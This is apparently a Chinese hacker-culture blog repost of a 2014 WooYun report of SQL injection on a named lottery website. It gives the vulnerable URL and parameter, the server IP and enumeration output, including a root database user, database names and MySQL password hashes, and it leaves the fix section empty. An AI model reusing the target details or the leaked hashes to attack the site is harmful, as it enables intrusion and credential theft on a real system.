记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

某彩票网站SQL注入

2014-09-27 11:55

http://www.17500.cn/p3/p3detail.php?i=2014193

漏洞证明:

Target: http://www.17500.cn/p3/p3detail.php?i=2014193

Host IP:114.112.90.118

Web Server: nginx

DB Server: MySQL >=5

Resp. Time(avg):95 ms

Current User: root@192.168.100.118

Sql Version: 5.5.28a-MariaDB-log

Current DB: cnlot2004

System User: root@192.168.100.118

Host Name: n1.17500.cn

Installation dir: /usr/local/mysql

DB User & Pass: root:*ECBFBCEB2FFA7684E54A0967F4FEFCAC3B13F130:%

repl:*D98280F03D0F78162EBDBB9C883FC01395DEA2BF:%

cnlot:*52C1FA8A6AFC2C00F0C414141DDC561DF1D5103F:%

cnlot:*52C1FA8A6AFC2C00F0C414141DDC561DF1D5103F:localhost

haproxy::192.168.10.201

Data Bases: information_schema

cnlot2004

?pub

epub2009

epublish

hctest

lebi_mobile

mysql

performance_schema

sess

test

testcnlot2004

tsfw

Data Bases: information_schema

cnlot2004





R{CVFB%)CI]%7F2%45_U)IH.jpg



修复方案:

- -


知识来源: www.wooyun.org/bugs/wooyun-2014-072134

阅读:92680 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“某彩票网站SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云